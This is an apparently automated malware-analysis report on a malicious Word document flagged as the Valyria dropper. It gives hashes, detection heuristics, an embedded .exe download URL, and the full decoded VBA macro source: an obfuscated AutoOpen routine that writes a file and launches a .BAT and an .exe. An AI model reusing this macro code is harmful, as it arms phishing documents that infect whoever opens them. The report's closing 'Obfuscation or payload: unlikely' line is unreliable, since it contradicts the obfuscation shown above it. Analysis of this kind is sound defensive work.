Valyria — Office (OOXML) malware analysis

Static analysis result for SHA-256 c30f156c7f16088e…

MALICIOUS

Office (OOXML)

Size: 85.0 KB
Created: 2020-01-13 01:40:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-07-24
MD5: 319f983351e54f8557490d3234d836db
SHA-1: a0f29b67f9edff08c2dd9247a7ad117612f877fa
SHA-256: c30f156c7f16088e24459a94254476f82e2ad64a7de0f2c2cf235c980b858d4c
Risk Score: 190

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Valyria-8011744-0. It contains VBA macros, specifically an AutoOpen macro, which is designed to execute code upon opening the document. This macro likely downloads and executes a second-stage payload, a common tactic for dropper malware.

Heuristics 5

  • ClamAV: Doc.Dropper.Valyria-8011744-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-8011744-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://linkomember.info/1/trader.exe In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename   Kind   Source   Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 29917 bytes
SHA-256: bd9546ffffeb292ce892fefe9ee2d5d3ed63328afa61868402775f6cba6dba5b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EndTime"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Apple"
Option Explicit

Public Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Public Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type



Public Const NORMAL_PRIORITY_CLASS = &H20&
Public Const INFINITE = -1&


Attribute VB_Name = "Potatoes"



Const MOVEFILE_REPLACE_EXISTING = &H1
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Const FILE_BEGIN = 0
Const FILE_SHARE_READ = &H1
Const CREATE_ALWAYS = 2
Const OPEN_EXISTING = 4
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000



Attribute VB_Name = "ClockFinished"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public sCurrentFile As String
Private Type ObjectProperties
  Name As String
  Caption As String
  ToolTip As String
End Type
Private Type FormProperties
  Name As String
  Caption As String
  ObjectCount As Integer
  ObjProp() As ObjectProperties
End Type

Private FormProp() As FormProperties
Private iFormCount As Integer
Sub LoadLanguagePack(sFile As String)
  Dim sLine As String, iPos As Integer, sTmp As String
  Dim sFormName As String, sTmp2 As String
  Dim bFormFound As Boolean
  sCurrentFile = sFile
  iFormCount = 0
  Open sFile For Input As #1
    Do
      Input #1, sLine
      If Left$(sLine, 1) = ";" Or sLine = "" Then GoTo Jump

      If Left$(sLine, 1) = "[" And Right$(sLine, 5) = ".End]" Then
        bFormFound = False: GoTo Jump
      End If
      If Left$(sLine, 1) = "[" And Right$(sLine, 1) = "]" Then
        bFormFound = True
        sFormName = Mid$(sLine, 2, Len(sLine) - 2)
        iFormCount = iFormCount + 1
        ReDim Preserve FormProp(iFormCount)
        FormProp(iFormCount).Name = sFormName: GoTo Jump
      End If
      
      If Left$(sLine, 7) = "Caption" Then
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
        FormProp(iFormCount).Caption = Left$(sTmp, Len(sTmp) - 1)
        GoTo Jump
      End If
            iPos = InStr(sLine, ".Caption")
      
      If iPos > 0 And bFormFound Then
        FormProp(iFormCount).ObjectCount = FormProp(iFormCount).ObjectCount + 1
        ReDim Preserve FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount)
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Caption = sTmp
        GoTo Jump
      End If
            iPos = InStr(sLine, ".ToolTip")
      If iPos > 0 And bFormFound Then
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).ToolTip = sTmp
        GoTo Jump
      End If
      
Jump:


    Loop Until EOF(1)

  Close #1

End Sub


Sub SetLanguageInForm(frmForm As Form)
  
  On Local Error Resume Next
  Dim I As Integer, j As Integer
  Dim iForm As Integer
  

  For I = 1 To iFormCount
    If FormProp(I).Name = frmForm.Name Then
      iForm = I
      Exit For
    End If
  Next I

  
  frmForm.Caption = FormProp(iForm).Caption
    For j = 1 To FormProp(iForm).ObjectCount
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).Caption = FormProp(iForm).ObjProp(j).Caption
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).TooltipText = FormProp(iForm).ObjProp(j).ToolTip
  Next j
  
End Sub

Function EnumLanguagePacks(sFolder As String, sExtension As String) As String

  If Not DirExists(sFolder) Then
    MsgBox sFolder & " doesn't exist.", vbCritical
    Exit Function
  End If
  
  Dim sTmp As String

  If Right$(sFolder, 1) <> "\" Then sFolder = sFolder & "\"
  sTmp = Dir$(sFolder & sExtension)
  If sTmp <> "" Then
    EnumLanguagePacks = sTmp
    sTmp = Dir$
    While Len(sTmp) > 0
      EnumLanguagePacks = EnumLanguagePacks & "|" & sTmp
      DoEvents
      sTmp = Dir$
    Wend
  End If

End Function


Private Function DirExists(ByVal strDirName As String) As Integer
    Const strWILDCARD$ = "*.*"

    Dim strDummy As String

    On Error Resume Next

    If Right$(strDirName, 1) <> "\" Then strDirName = strDirName & "\"
    strDummy = Dir$(strDirName & strWILDCARD, vbDirectory)
    DirExists = Not (strDummy = vbNullString)

    Err = 0
End Function


Sub CarregaPacotedeLinguagem(sArquivo As String)
  
  LoadLanguagePack sArquivo
  
End Sub

Sub SetaLinguagemnoForm(frmForm As Form)

  SetLanguageInForm frmForm

End Sub

Function EnumeraPacotesdeLinguagem(sDiretorio As String, sExtensao As String) As String
  
  EnumLanguagePacks sDiretorio, sExtensao
  
End Function



Attribute VB_Name = "Carrow"
'Begin Code
Public mf As String


Function GetAssist() As Boolean
Dim lHandle

     mf = DeCryptCustom1("ђ€«љ¶ДВДѕК", "MN7Ke87Y")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    
        mf = DeCryptCustom1("ѓ{ћ‹ёѕ»", "lQI8")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    
    lHandle = CreateFileA(DeCryptCustom1("_Wzi…“‘“Ќ™‚w—ќЏќ•[pp„", "QmZKKk"), GENERIC_WRITE Or GENERIC_READ, _
                         &H2, 0, CREATE_ALWAYS, FILE_SHARE_WRITE, 0)
    
    If lHandle <> 0 Then CloseHandle lHandle

        mf = DeCryptCustom1("ІЄНєзнкТ№бикао", "Cwqhud")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    

        mf = DeCryptCustom1("ўљЅЄЧЭЪВ©СШЪРЮЙІФвЪв", "ebBUfIgru")
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
' [The 21 junk statements above are repeated verbatim seven more times at this point in the extracted source; repeats omitted.]
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    

        mf = DeCryptCustom1("ћ–№ўДТКТТН", "xv3dLJV9u8")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    
    Open DeCryptCustom1("_Wzi…“‘“Ќ™‚w—ќЏќ•[pp„", "QmZKKk") For Output As #1
    Print #1, BlueControl.FAQ.Caption
    Close #1

    Testing
    
End Function
Sub autoopen()
On Error Resume Next
'The Food Storage & Distribution Federation
GetAssist
CopyToA
End Sub
Public Sub CopyToA()
    Dim docActive As Document
    Dim docNew As Document
    Dim rngActiveDocPart As Range
    Dim rngNewDocPart As Range
    Dim strDocName As String
    Dim Proc As PROCESS_INFORMATION
    Dim strTemplateName As String
    Dim start As STARTUPINFO
    Set docActive = ActiveDocument
    
    strDocName = docActive.Name
    strTemplateName = docActive.AttachedTemplate.FullName
    

    Set docNew = Documents.Add(strTemplateName)
    
 
    For Each rngActiveDocPart In docActive.StoryRanges
        Set rngNewDocPart = docNew.StoryRanges _
           (rngActiveDocPart.StoryType)
        rngActiveDocPart.Copy
                
   
        rngNewDocPart.Paste
    Next rngActiveDocPart
    
    docNew.Activate
 
    With Dialogs(wdDialogFileSaveAs)
        .Name = "" & strDocName
        .Show
    End With
End Sub




Public Function DeCryptCustom1(tSource As String, tKey As String) As String
    Dim iPassword As Integer
    Dim iCrypt As Integer
    Dim X As Integer
    For X = 1 To Len(tKey)
        iPassword = iPassword + Asc(Mid$(tKey, X, 1))
    Next X
    For X = 1 To Len(tSource)
        iCrypt = Asc(Mid$(tSource, X, 1)) - iPassword - X
        Do Until iCrypt > 0
            iCrypt = iCrypt + 255
        Loop
        DeCryptCustom1 = DeCryptCustom1 & Chr(iCrypt)
    Next X
End Function




Attribute VB_Name = "BlueControl"
Attribute VB_Base = "0{1883E2FD-255C-4B77-AF2B-D30D5CEBF50D}{C4B6742A-8564-4F6B-9FC8-F10F182564F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "cPalette"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EnumsTip"

Public Sub ExecCmd(cmdline As String)
Dim Proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue

start.cb = Len(start)
start.dwFlags = 1&
ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 0&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, Proc)

Do
ReturnValue = WaitForSingleObject(Proc.hProcess, 0)
DoEvents
Loop Until ReturnValue <> 258

ReturnValue = CloseHandle(Proc.hProcess)
End Sub

Public Function Testing() As Boolean
ExecCmd "C:\Jeropit\Poteri.BAT"
ExecCmd "C:\Htyu\Bioper\Kyupod.exe"
End Function




Attribute VB_Name = "wDelcares"
#If VBA7 Then
Public Declare PtrSafe Function SetPixel Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal crColor As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal crTransparent As LongPtr) As Boolean
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As LongPtr
Public Declare PtrSafe Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As LongPtr, ByVal dwMilliseconds As LongPtr) As LongPtr

Public Declare PtrSafe Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As LongPtr, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As LongPtr, ByVal dwCreationFlags As LongPtr, _
ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As LongPtr, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As LongPtr


Public Declare PtrSafe Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As LongPtr
Public Declare PtrSafe Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare PtrSafe Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As LongPtr) As LongPtr
Public Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteObject Lib "gdi32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function SelectObject Lib "gdi32" (ByVal hDC As LongPtr, ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function BitBlt Lib "gdi32" (ByVal hDestDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function StretchBlt Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function GetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function SetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr, ByVal nStretchMode As LongPtr) As LongPtr
#Else
Public Declare Function SetPixel Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long
Public Declare Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function DeleteDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal crTransparent As Long) As Boolean
Public Declare Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As Long, ByVal dwMilliseconds As Long) As Long

Public Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long


Public Declare Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As Long
Public Declare Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Public Declare Function SelectObject Lib "gdi32" (ByVal hDC As Long, ByVal hObject As Long) As Long
Public Declare Function StretchBlt Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Public Declare Function GetStretchBltMode Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function SetStretchBltMode Lib "gdi32" (ByVal hDC As Long, ByVal nStretchMode As Long) As Long
#End If




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{71D5EFF2-3F92-410F-AC0F-568B57B32146}{D5F739E2-E14E-4970-B4B8-3B50CA408227}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{0D187E7A-FC53-4A33-BBAC-4EFC775E3129}{51908BC7-A5C5-4F4B-82EC-420DF409B5F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 85504 bytes
SHA-256: de47d23e5bd82607c0eaffdf163cd938583d3978f933a27ce35f36fced2b8792
Detection
ClamAV: Doc.Dropper.Valyria-8011744-0
Obfuscation or payload: unlikely